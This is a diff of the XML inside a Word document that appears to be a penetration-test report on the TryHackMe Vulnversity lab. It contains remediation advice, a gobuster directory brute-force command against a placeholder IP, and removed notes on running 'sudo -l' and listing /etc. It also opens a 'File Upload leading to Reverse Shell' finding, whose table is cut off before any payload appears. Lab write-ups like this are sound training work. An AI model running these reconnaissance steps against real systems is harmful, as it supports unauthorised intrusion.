+          <w:numId w:val="27"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Read blogs or access files he shouldn’t </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Exposure of hidden endpoints that were not meant for public access.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>RECOMMENDATIONS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
         </w:numPr>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Restrict access to sensitive directories using authentication, IP allowlists, or firewalls.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Use a WAF or reverse proxy to hide internal structure and filter malicious requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>i tried to see my accessible commands but it returns nothing it just needs password by this command 'sudo -l'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>Steps to Reproduce</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="765CA879" wp14:editId="62C7B200">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>left</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>241935</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5695950" cy="266700"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="217" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5695950" cy="266700"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>gobuster</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>dir</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> -u http://</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>&lt;ip&gt;</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>:3333/ -w /</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>usr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>/share/wordlists/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>dirbuster</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>/directory-list-1.0.txt</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="765CA879" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:19.05pt;width:448.5pt;height:21pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>gobuster</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>dir</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> -u http://</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>&lt;ip&gt;</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>:3333/ -w /</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>usr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>/share/wordlists/</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>dirbuster</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>/directory-list-1.0.txt</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  tool</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> run the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>following  command</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DBA0EE1" wp14:editId="57331759">
-            <wp:extent cx="5943600" cy="251460"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A2786FD" wp14:editId="5A08B39D">
+            <wp:extent cx="6353175" cy="2783586"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="126403251" name="Picture 2"/>
+            <wp:docPr id="2002877845" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2600,11 +4426,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="126403251" name="Picture 126403251"/>
+                    <pic:cNvPr id="2002877845" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12">
+                    <a:blip r:embed="rId20" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2618,7 +4444,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="251460"/>
+                      <a:ext cx="6381273" cy="2795897"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2633,39 +4459,740 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3109B43D" wp14:editId="5EAA9769">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>left</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>296545</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5772150" cy="342900"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="804197840" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5772150" cy="342900"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:hyperlink r:id="rId21" w:history="1">
+                              <w:r>
+                                <w:rPr>
+                                  <w:rStyle w:val="Hyperlink"/>
+                                </w:rPr>
+                                <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/fuzzing/results.txt</w:t>
+                              </w:r>
+                            </w:hyperlink>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="3109B43D" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:23.35pt;width:454.5pt;height:27pt;z-index:251663360;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:hyperlink r:id="rId22" w:history="1">
+                        <w:r>
+                          <w:rPr>
+                            <w:rStyle w:val="Hyperlink"/>
+                          </w:rPr>
+                          <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/fuzzing/results.txt</w:t>
+                        </w:r>
+                      </w:hyperlink>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can check the fuzzing output </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>3- i tried to see detailed info about /etc and /etc/default by this command 'ls -ld /etc /etc/default'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:noProof/>
+          <w:color w:val="C00000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc215079553"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="C00000"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>File Upload leading to Reverse Shell</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="PlainTable1"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2875"/>
+        <w:gridCol w:w="6475"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="467"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Severity </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t>Critical</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="431"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>CVSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId23" w:anchor="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>CVSS 9.8</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="440"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Affected Assets</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId24" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://tryhackme.com/room/vulnversity</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="422"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rtl/>
+                <w:lang w:bidi="ar-EG"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:bidi="ar-EG"/>
+              </w:rPr>
+              <w:t>Reference</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
